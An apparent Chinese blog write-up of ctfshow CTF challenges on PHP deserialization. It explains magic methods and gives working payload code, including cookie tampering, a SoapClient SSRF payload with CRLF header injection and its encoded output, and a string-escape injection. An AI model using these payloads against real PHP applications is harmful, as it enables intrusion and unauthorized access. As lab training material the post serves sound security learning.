• ctfshow 反序列化


    PHP反序列化前置知识

    序列化和反序列化

    对象是不能在字节流中传输的,序列化就是把对象转化为字符串以便存储和传输,反序列化就是将字符串转化为对象

    魔术方法

    __construct() //构造,当对象new时调用
    __wakeup() //执行unserialize()时,先会调用这个函数
    __sleep() //执行serialize()时,先会调用这个函数
    __destruct() //对象被销毁时触发
    __call() //在对象上下文中调用不可访问的方法时触发
    __callStatic() //在静态上下文中调用不可访问的方法时触发
    __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
    __set() //用于将数据写入不可访问的属性
    __isset() //在不可访问的属性上调用isset()或empty()触发
    __unset() //在不可访问的属性上使用unset()时触发
    __toString() //把类当作字符串使用时触发
    __invoke() //当尝试将对象调用为函数时触发

    POP链

    在这里插入图片描述

    web254

    在这里插入图片描述
    这里其实没有涉及反序列化。这题使用GET方式获取username和password的值,创建一个ctfshowUser对象,->代表指向,首先调用上面的login方法,login方法使用this代表前面的username和password的值为ctfshowUser的值xxxxxx,如果满足条件就把 $this->isVip=true,然后通过vipOneKeyGetFlag()通过判断获取flag,构造?username=xxxxxx&password=xxxxxx即可
    在这里插入图片描述

    web255

    在这里插入图片描述
    这题的区别在于login方法不能把isvip置为true,而且user为对cookie值进行反序列化的结果,这里我们需要对class ctfShowUser进行序列化,并且修改 public $isVip=false为true,首先构造序列化,然后将序列化结果以cookie方式传递

    <?php
    class ctfShowUser{
        public $isVip=true;
    }
    $a=new ctfShowUser;
    echo urlencode(serialize($a));
    ?>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    在这里插入图片描述
    在这里插入图片描述

    web256

    在这里插入图片描述
    这题需要构造username不等于password,原来他们都是xxxxxx,现在需要通过序列化修改初始值
    在这里插入图片描述
    在这里插入图片描述

    web257

    __construct() //构造,当对象new时调用
    __destruct() //对象被销毁时触发
    这题在新建对象时先实例化info,然后在销毁时调用getinfo方法,而我们的最终目的是调用backdoor的方法使用eval这个函数
    在这里插入图片描述

    在这里插入图片描述

    web258

    这题使用正则表达式过滤,使用+号绕过
    在这里插入图片描述

    在这里插入图片描述

    web259

    在这里插入图片描述
    __call 在对象中调用一个不可访问方法时调用
    在这道题中$vip->getFlag();因为调用了类中没有的方法所以会导致__call的执行
    在这里插入图片描述
    payload

    
    $target = 'http://127.0.0.1/flag.php';
    $post_string = 'token=ctfshow';
    $b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
    $a = serialize($b);
    $a = str_replace('^^',"\r\n",$a);
    echo urlencode($a);
    ?>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22ssrf%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A128%3A%22wupco%0D%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7Dr
    传入vip,然后访问flag.txt即可
    在这里插入图片描述

    web260

    在这里插入图片描述
    此题只需要满足匹配条件就行

    web261

    在这里插入图片描述
    题目是这样的,构造payload

    
        class ctfshowvip{
        	public $username="877.php";
        	public $password='';
    }
    $a=new ctfshowvip();
    echo urlencode(serialize($a));
    ?>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    首先,__construct方法是创建对象时调用的,我们现在给username和password赋予初值,同时对象销毁时调用__destruct,这里进行了弱类型比较,0x36D=877.php,然后__unserialize() 和 __wakeup()两个魔术方法都定义在用一个对象中, 则只有 __unserialize() 方法会生效,__wakeup() 方法会被忽略。这里进行了字符串拼接
    在这里插入图片描述

    web262字符串逃逸

    在这里插入图片描述
    这题主要考察字符串逃逸, PHP 在反序列化时,对类中不存在的属性也会进行反序列化
    • PHP 在反序列化时,底层代码是以 ;作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的
    序列化
    在这里插入图片描述
    在这里插入图片描述
    需要构造 “;s:5:“token”;s:5:“admin”;},一共27字符
    构造payload
    f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck”;s:5:“token”;s:5:“admin”;},然后访问message.php即可
    在这里插入图片描述

  • 相关阅读:
    2:开发环境搭建-Java Web
    picoCTF - Day 1 - Warm up
    ssm+mysql实现进销存系统
    heroku的使用,部署node后端
    二氧化钛接枝聚(苯乙烯-二乙烯苯)/马来酸酐多孔纳米复合微球
    海豚调度系列之:任务类型——SPARK节点
    人先自辱,而后人辱之
    聊聊httpclient的evict操作
    【用户画像】在ClickHouse中将宽表转换为bitmap表(源码实现)、用户分群架构设计、SpringBoot概述及使用
    DRL基础(十一)——近端策略优化算法PPO【附代码】
  • 原文地址:https://blog.csdn.net/weixin_56537388/article/details/132389632